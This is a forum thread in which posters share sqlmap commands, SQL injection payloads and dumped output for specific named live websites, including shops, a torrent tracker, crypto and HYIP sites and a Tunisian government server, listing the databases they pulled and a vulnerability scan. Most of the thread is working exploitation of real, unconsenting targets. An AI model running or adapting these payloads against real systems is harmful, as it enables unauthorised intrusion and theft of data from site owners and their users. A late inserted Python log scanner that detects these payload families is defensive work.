
Interesting SQL injections & XSS found

Let's continue the torrent-tracker topic. This time it is a "private" resource.
Code:
sqlmap.py -u "https://softpilot.win/ajax.php" --data="action=user_register&form_token=&mode=check_invat&user_invat=-1'%20OR%203*2*1=6%20AND%20000272=000272%20--%20"  --random-agent --risk=3 --level=5  -dbms=mysql -dbs
Parameter: #1* ((custom) POST)
    Type: boolean-based blind
    Title: HAVING boolean-based blind - WHERE, GROUP BY clause
    Payload: action=user_register&form_token=&mode=check_invat&user_invat=-1' OR 3 HAVING 9783=9783-- Efjw21=6 AND 000272=000272 --

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: action=user_register&form_token=&mode=check_invat&user_invat=-1' OR 3 AND (SELECT 5661 FROM (SELECT(SLEEP(5)))IxYx)-- tNvv21=6 AND 000272=000272 --
---
[INFO] testing MySQL
[INFO] confirming MySQL
[INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.16
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[INFO] fetching database names
[INFO] fetching number of databases
[INFO] resumed: 3
[INFO] resumed: information_schema
[INFO] resumed: test
[INFO] resumed: torrnada_club
available databases [3]:
[*] information_schema
[*] test
[*] torrnada_club
 
Shop
Code:
sqlmap -u "https://www.xtooleshop.com/ajax/pro_match_choose.asp?ChosenProIDs=1" -p ChosenProIDs --dbms=mssql --technique=S --random-agent --threads=10
---
Parameter: ChosenProIDs (GET)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: ChosenProIDs=1);WAITFOR DELAY '0:0:5'--
---
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] dbq_XTOOLeShop_com
 
sqlmap -u "https://100shin.ua/modules/orinoko_stores/orinoko_storesCallList.php" --data="allStoresList=1&city=%D0%96%D0%B8%D1%82%D0%BE%D0%BC%D0%B8%D1%80&id_lang=0'XOR(if(now()=sysdate()%2Csleep(6)%2C0))XOR'Z" --random-agent --level=5 --risk=3 --dbms=mysql

---
Parameter: id_lang (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: allStoresList=1&city=%D0%96%D0%B8%D1%82%D0%BE%D0%BC%D0%B8%D1%80&id_lang=-3396' OR 5658=5658-- ivQj

Type: time-based blind
Title: MySQL >= 5.0.12 OR time-based blind (SLEEP)
Payload: allStoresList=1&city=%D0%96%D0%B8%D1%82%D0%BE%D0%BC%D0%B8%D1%80&id_lang=0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z' OR SLEEP(5)-- LBIx
 
Tunisian government website infected with vulnerabilities


+ Target IP: 196.203.190.19
+ Target Hostname: www.inscription.tn
+ Target Port: 443
---------------------------------------------------------------------------
+ SSL Info: Subject: /CN=*.inscription.tn
Ciphers: ECDHE-RSA-AES256-GCM-SHA384
Issuer: /C=GB/ST=Greater Manchester/L=Salford/O=Sectigo Limited/CN=Sectigo RSA Domain Validation Secure Server CA
+ Message: Multiple IP addresses found: 196.203.190.19, 196.203.190.20, 196.203.190.21, 196.203.190.22, 196.203.190.18
+ Start Time: 2021-08-27 09:30:43 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.15 (Red Hat)
+ Server may leak inodes via ETags, header found with file /, inode: 10360516, size: 7639, mtime: Fri Sep 6 12:58:17 2019
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The site uses SSL and Expect-CT header is not present.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.2.15 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Server is using a wildcard certificate: *.inscription.tn
 
Hahaha, laughed out loud... my colleague and I just cracked up :D I just don't know where to post this.
Someone decided to set up a mega payment service (the domain is actually good, by the way).
What?
 
sqlmap --random-agent --level=5 --risk=3 --dbms=mysql -u 'http://www.immefconcept.com.br/banner.php?codBanner=2'

Parameter: codBanner (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: codBanner=2' RLIKE (SELECT (CASE WHEN (4895=4895) THEN 2 ELSE 0x28 END)) AND 'XxQv'='XxQv

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: codBanner=2' AND (SELECT 1628 FROM(SELECT COUNT(*),CONCAT(0x716b716a71,(SELECT (ELT(1628=1628,1))),0x7176707a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'mLyY'='mLyY
 
www.lillion.io

POST /dapp/forgetpass.php HTTP/1.1
Content-Length: 68
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: https://www.lillion.io/
Cookie: PHPSESSID=112d2dbec54385b4e6c9a6daf9e596e6
Host: www.lillion.io
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

send_otp=&regNo=-1'%20OR%203*2*1%3d6%20AND%20000660%3d000660%20--%20

Parameter: #1* ((custom) POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: send_otp=&regNo=-1795' OR 9369=9369-- xGbd

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: send_otp=&regNo=1' AND (SELECT 2624 FROM (SELECT(SLEEP(5)))uviD)-- wnMo
---
[17:05:41] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.21.4
back-end DBMS: MySQL >= 5.0.12
[17:05:41] [INFO] fetching database names
[17:05:41] [INFO] resumed: lillioni_db
available databases [2]:
[*] information_schema
[*] lillioni_db

The token is being traded; I'm not interested in the site.
 
 

GET /news.php?dt=1 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: https://eliot-pro.space/
Cookie: PHPSESSID=8852aa508d2492ea2f1b2baf864d21b9; ref_sess_un=Emilsaj; autoref=1; _ym_uid=1645379580962799975; _ym_d=1645537138; _ym_isad=2; _ym_visorc=w
Host: eliot-pro.space
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

Parameter: dt (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: dt=-6061" OR 6317=6317-- IQVQ

Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: dt=1";SELECT SLEEP(5)#

Type: time-based blind
Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP)
Payload: dt=1" OR (SELECT 1619 FROM (SELECT(SLEEP(5)))XVeh)-- tUQH

Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: dt=1" UNION ALL SELECT NULL,CONCAT(0x7170716271,0x6c4c616c416547696c4f636f527545644b6759695459767a786b7676754543775a4c5768596b4f5a,0x7178787871),NULL,NULL,NULL,NULL,NULL-- -
---
[05:43:19] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.1.33
back-end DBMS: MySQL >= 5.0.12
[05:43:19] [INFO] fetching database names
available databases [2]:
[*] andrey27_rbt
[*] information_schema
 
Code:
    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: https://garantstore.ru:443/search?search=the" UNION ALL SELECT NULL,CONCAT(0x7171706b71,0x5062546b6a476654585342697278656b6d6a486d5a774b59506e7077506745587576516a4172426a,0x71766a7071),NULL,NULL,NULL,NULL,NULL-- -

available databases [11]:
[*] admin_garantstore
[*] admin_mega_blitz
[*] admin_shop_warthunder
[*] admin_skinscsgoru
[*] admin_tanki_shop
[*] admin_wargaming_su
[*] admin_warthunder_com_ru
[*] admin_wgblitz
[*] admin_wgprem
[*] admin_wot_lot_ru
[*] information_schema
 
Code:
    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: https://hyip-monitor.fr:443/get_rcb_datas.php?id=25' OR (SELECT 3035 FROM(SELECT COUNT(*),CONCAT(0x716a6a6a71,(SELECT (ELT(3035=3035,1))),0x7176766b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wkyH

available databases [2]:
[*] hyip_monitor_fr
[*] information_schema
 
Code:
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: https://islamicstore.ru:443/?_=1645024590106&action=add&ajax=1&controller=products-comparison&id_product=-8031") OR 3665=3665 AND ("BkRS"="BkRS

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: https://islamicstore.ru:443/?_=1645024590106&action=add&ajax=1&controller=products-comparison&id_product=2930") AND (SELECT 1686 FROM (SELECT(SLEEP(10)))pSGF) AND ("yRRB"="yRRB
---
available databases [2]:
[*] admin_BKpWGJXYLV
[*] information_schema
 
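Added example, not code from this thread or any of its posters: a small Python access-log scanner that flags the sqlmap payload families seen in the dumps above (boolean-based, time-based MySQL/MSSQL, stacked, error-based FLOOR, UNION) so a defender can spot such probing. The log lines, IPs and paths are constructed placeholders; only the payload shapes mirror the thread.

```python
import re
from urllib.parse import unquote_plus

# Payload families distilled from the sqlmap dumps in this thread; defensive heuristics that
# match the decoded, lower-cased request target and will miss other encodings or comment tricks.
SIGNATURES = {
    "boolean_blind": re.compile(r"\b(or|and)\b\s*\d+\s*(\*\s*\d+\s*)*=\s*\d+"),
    "time_based_mysql": re.compile(r"\bsleep\s*\(\s*\d+\s*\)"),
    "time_based_mssql": re.compile(r"\bwaitfor\s+delay\s+'"),
    "stacked_query": re.compile(r";\s*(select|waitfor|insert|update|drop)\b"),
    "error_based_floor": re.compile(r"\bfloor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\)"),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b"),
}
# Common/combined access-log line: ip ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

def normalize(target: str) -> str:
    """Decode twice (the requests above double-encode spaces and quotes), fold case and whitespace."""
    return re.sub(r"\s+", " ", unquote_plus(unquote_plus(target))).lower()

def classify(target: str) -> list:
    """Names of every signature that matches one request target (empty list if it looks clean)."""
    return [name for name, rx in SIGNATURES.items() if rx.search(normalize(target))]

def scan_log(lines):
    """Yield (client_ip, request_target, matched_signatures) for each suspicious log line."""
    for line in lines:
        m = LOG_RE.match(line)
        if m and (hits := classify(m.group("path"))):
            yield m.group("ip"), m.group("path"), hits

def offenders(lines, threshold=2):
    """Count hits per client IP; sqlmap fires many probes, so repeat hitters are likely scanners."""
    counts = {}
    for ip, _target, _hits in scan_log(lines):
        counts[ip] = counts.get(ip, 0) + 1
    return {ip: n for ip, n in counts.items() if n >= threshold}

# Constructed sample log lines (placeholder IPs and paths; payload shapes mirror the thread's dumps)
SAMPLE_LOG = [
    '203.0.113.5 - - [27/Aug/2021:09:30:43 -0400] "GET /item.php?id=2 HTTP/1.1" 200 512',
    '203.0.113.5 - - [27/Aug/2021:09:30:44 -0400] "GET /item.php?id=2%27%20OR%203*2*1%3d6%20AND%20000272%3d000272%20--%20 HTTP/1.1" 200 512',
    '203.0.113.5 - - [27/Aug/2021:09:30:45 -0400] "GET /news.php?dt=1%22;SELECT%20SLEEP(5)%23 HTTP/1.1" 200 88',
    '198.51.100.7 - - [27/Aug/2021:09:31:02 -0400] "GET /list.asp?ids=1);WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1" 500 0',
    '198.51.100.7 - - [27/Aug/2021:09:31:10 -0400] "GET /search?q=the%22%20UNION%20ALL%20SELECT%20NULL,NULL,NULL--%20- HTTP/1.1" 200 3100',
]
```

Access logs carry only the request line, so the POST-body injections shown in this thread are only visible with request-body logging or a WAF in front of the application; the durable fix on the server side is parameterized queries rather than string-built SQL.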
Interesting!
Thanks a lot)
 

